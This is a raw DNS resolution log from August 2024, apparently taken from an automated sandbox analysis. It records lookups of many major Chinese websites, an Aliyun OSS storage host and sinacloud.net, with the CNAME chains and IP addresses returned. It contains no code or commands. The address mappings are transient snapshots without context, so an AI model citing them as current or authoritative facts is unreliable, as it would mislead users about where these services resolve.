                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)spool.grid.sinaedge.comww1.sinaimg.cn.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.239A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.241A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.243A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.204A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.245A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.220817089 CEST114.114.114.114192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.42.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.226829052 CEST8.8.8.8192.168.2.60x100No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.226829052 CEST8.8.8.8192.168.2.60x100No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.226829052 CEST8.8.8.8192.168.2.60x100No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.226829052 CEST8.8.8.8192.168.2.60x100No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.comwww.douyin.com.bytedns1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.bytedns1.comwww.douyin.com.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.w.kunluncan.comwww.douyin.com.queniuyk.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.239377022 CEST8.8.8.8192.168.2.60x100No error (0)www.douyin.com.queniuyk.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.249089003 CEST114.114.114.114192.168.2.60x100No error (0)www.sogou.com119.28.109.132A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.272392035 CEST114.114.114.114192.168.2.60x100No error (0)www.so.comso.seos-lb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.272392035 CEST114.114.114.114192.168.2.60x100No error (0)so.seos-lb.com104.192.110.226A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.289340019 CEST8.8.8.8192.168.2.60x100No error (0)soso.comsh2.general.proxy.sogou.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.289340019 CEST8.8.8.8192.168.2.60x100No error (0)sh2.general.proxy.sogou.com49.51.65.181A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.309252024 CEST114.114.114.114192.168.2.60x100No error (0)www.qq.comwww.qq.com.eo.dnse2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.309252024 CEST114.114.114.114192.168.2.60x100No error (0)www.qq.com.eo.dnse2.com43.132.73.61A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.346046925 CEST8.8.8.8192.168.2.60x100No error (0)www.jd.comwww.jd.com.gslb.qianxun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.346046925 CEST8.8.8.8192.168.2.60x100No error (0)www.jd.com.gslb.qianxun.comjd-abroad.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.346046925 CEST8.8.8.8192.168.2.60x100No error (0)jd-abroad.cdn20.com163.171.132.119A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.368020058 CEST8.8.8.8192.168.2.60x100No error (0)www.sohu.comwww.sohu.com.dsa.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.368020058 CEST8.8.8.8192.168.2.60x100No error (0)www.sohu.com.dsa.dnsv1.comqt0t6l4k.e0.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.368020058 CEST8.8.8.8192.168.2.60x100No error (0)qt0t6l4k.e0.sched.ovscdns.com43.152.186.108A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.368020058 CEST8.8.8.8192.168.2.60x100No error (0)qt0t6l4k.e0.sched.ovscdns.com43.152.29.38A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.412667990 CEST8.8.8.8192.168.2.60x100No error (0)www.1688.comwww.1688.com.danuoyi.tbcache.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.412667990 CEST8.8.8.8192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.92.212A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.412667990 CEST8.8.8.8192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.92.213A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.432382107 CEST8.8.8.8192.168.2.60x100No error (0)www.so.comso.seos-lb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.432382107 CEST8.8.8.8192.168.2.60x100No error (0)so.seos-lb.com104.192.110.226A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.467128992 CEST114.114.114.114192.168.2.60x100No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.467128992 CEST114.114.114.114192.168.2.60x100No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.467128992 CEST114.114.114.114192.168.2.60x100No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.467128992 CEST114.114.114.114192.168.2.60x100No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)www.sina.com.cnspool.grid.sinaedge.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)spool.grid.sinaedge.comww1.sinaimg.cn.w.alikunlun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.514287949 CEST8.8.8.8192.168.2.60x100No error (0)ww1.sinaimg.cn.w.alikunlun.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.531963110 CEST8.8.8.8192.168.2.60x100No error (0)youdao.com111.124.200.101A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.531980038 CEST114.114.114.114192.168.2.60x100No error (0)soso.comsh2.general.proxy.sogou.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.531980038 CEST114.114.114.114192.168.2.60x100No error (0)sh2.general.proxy.sogou.com49.51.65.181A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.591969013 CEST8.8.8.8192.168.2.60x100No error (0)foodmate.net120.26.110.170A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.666521072 CEST114.114.114.114192.168.2.60x100No error (0)www.jd.comwww.jd.com.gslb.qianxun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.666521072 CEST114.114.114.114192.168.2.60x100No error (0)www.jd.com.gslb.qianxun.comjd-abroad.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.666521072 CEST114.114.114.114192.168.2.60x100No error (0)jd-abroad.cdn20.com138.113.236.64A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.666521072 CEST114.114.114.114192.168.2.60x100No error (0)jd-abroad.cdn20.com138.113.112.18A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.692784071 CEST114.114.114.114192.168.2.60x100No error (0)youdao.com111.124.200.101A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.700316906 CEST114.114.114.114192.168.2.60x100No error (0)www.hao123.comhao123.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.700316906 CEST114.114.114.114192.168.2.60x100No error (0)hao123.n.shifen.com103.235.46.98A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.706410885 CEST8.8.8.8192.168.2.60x100No error (0)www.hao123.comhao123.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.706410885 CEST8.8.8.8192.168.2.60x100No error (0)hao123.n.shifen.com103.235.46.98A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.739398003 CEST114.114.114.114192.168.2.60x100No error (0)www.1688.comwww.1688.com.danuoyi.tbcache.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.739398003 CEST114.114.114.114192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.199.200A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.739398003 CEST114.114.114.114192.168.2.60x100No error (0)www.1688.com.danuoyi.tbcache.com163.181.199.199A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.comwww.eastmoney.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.782965899 CEST8.8.8.8192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.811379910 CEST114.114.114.114192.168.2.60x100No error (0)www.jmw.com.cn47.94.225.221A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.828820944 CEST114.114.114.114192.168.2.60x100No error (0)foodmate.net120.26.110.170A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.845002890 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.comwww.tencent.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.845002890 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.com.cdn.dnsv1.comwww.tencent.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.845002890 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.118.238A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.845002890 CEST8.8.8.8192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.119.252A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:01.923161983 CEST8.8.8.8192.168.2.60x100No error (0)www.jmw.com.cn47.94.225.221A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.comwww.eastmoney.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.241A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.245A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.243A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.204A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.240A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.239A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204190016 CEST114.114.114.114192.168.2.60x100No error (0)www.eastmoney.com.w.cdngslb.com163.181.42.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204201937 CEST114.114.114.114192.168.2.60x100No error (0)www.cdstm.cnwww.cdstm.cn.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204201937 CEST114.114.114.114192.168.2.60x100No error (0)www.cdstm.cn.a.bdydns.comopencdnka.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.204201937 CEST114.114.114.114192.168.2.60x100No error (0)opencdnka.jomodns.com113.219.142.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206131935 CEST114.114.114.114192.168.2.60x100No error (0)www.cctv.comwww.cctv.com.wsglb0.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206131935 CEST114.114.114.114192.168.2.60x100No error (0)www.cctv.com.wsglb0.com163.171.208.133A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206131935 CEST114.114.114.114192.168.2.60x100No error (0)www.cctv.com.wsglb0.com138.113.115.36A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206163883 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.comwww.tencent.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206163883 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.com.cdn.dnsv1.comwww.tencent.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206163883 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.119.252A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206163883 CEST114.114.114.114192.168.2.60x100No error (0)www.tencent.com.acc.edgeonedy1.com43.159.118.238A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206176043 CEST8.8.8.8192.168.2.60x100No error (0)www.cctv.comwww.cctv.com.wsglb0.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206176043 CEST8.8.8.8192.168.2.60x100No error (0)www.cctv.com.wsglb0.com138.113.147.185A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.206176043 CEST8.8.8.8192.168.2.60x100No error (0)www.cctv.com.wsglb0.com163.171.128.148A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)www.hupu.comwww.hupu.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)www.hupu.com.cdn.dnsv1.comdc3ee476.ovslegodl-dk.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.186.117A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.245A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.200A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.242A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.251A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.66.196A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.186.122A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.207051992 CEST8.8.8.8192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.186.235A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450134039 CEST114.114.114.114192.168.2.60x100No error (0)zhangjiakoucs.oss-accelerate.aliyuncs.comds-2089.oss-acc-allline.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450134039 CEST114.114.114.114192.168.2.60x100No error (0)ds-2089.oss-acc-allline.aliyuncs.comds-2089.oss-acc-allline.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450134039 CEST114.114.114.114192.168.2.60x100No error (0)ds-2089.oss-acc-allline.aliyuncs.com.gds.alibabadns.comap-southeast-1-ds-2089.oss-acc.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450134039 CEST114.114.114.114192.168.2.60x100No error (0)ap-southeast-1-ds-2089.oss-acc.aliyuncs.com161.117.242.93A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)www.hupu.comwww.hupu.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)www.hupu.com.cdn.dnsv1.comdc3ee476.ovslegodl-dk.sched.ovscdns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.27.8A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.143.134A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.80.175A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.185A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.9A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.188A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.81.173A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.139A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.152.143.159A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.80.77A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.80.158A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.175.139.72A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.81.194A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com101.33.26.246A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.450706005 CEST114.114.114.114192.168.2.60x100No error (0)dc3ee476.ovslegodl-dk.sched.ovscdns.com43.132.81.100A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.505940914 CEST8.8.8.8192.168.2.60x100No error (0)zhangjiakoucs.oss-accelerate.aliyuncs.comds-2089.oss-acc-allline.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.505940914 CEST8.8.8.8192.168.2.60x100No error (0)ds-2089.oss-acc-allline.aliyuncs.comds-2089.oss-acc-allline.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.505940914 CEST8.8.8.8192.168.2.60x100No error (0)ds-2089.oss-acc-allline.aliyuncs.com.gds.alibabadns.comeu-central-1-ds-2089.oss-acc.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.505940914 CEST8.8.8.8192.168.2.60x100No error (0)eu-central-1-ds-2089.oss-acc.aliyuncs.com47.254.187.187A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.636137962 CEST8.8.8.8192.168.2.60x100No error (0)www.cdstm.cnwww.cdstm.cn.a.bdydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.636137962 CEST8.8.8.8192.168.2.60x100No error (0)www.cdstm.cn.a.bdydns.comopencdnka.jomodns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:02.636137962 CEST8.8.8.8192.168.2.60x100No error (0)opencdnka.jomodns.com113.219.142.35A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:03.869155884 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:03.869155884 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.109668970 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.109668970 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.388722897 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.388722897 CEST8.8.8.8192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.630693913 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.179A (IP address)IN (0x0001)false
                                                                                                                                    Aug 6, 2024 10:30:04.630693913 CEST114.114.114.114192.168.2.60x100No error (0)sinacloud.net27.221.16.149A (IP address)IN (0x0001)false
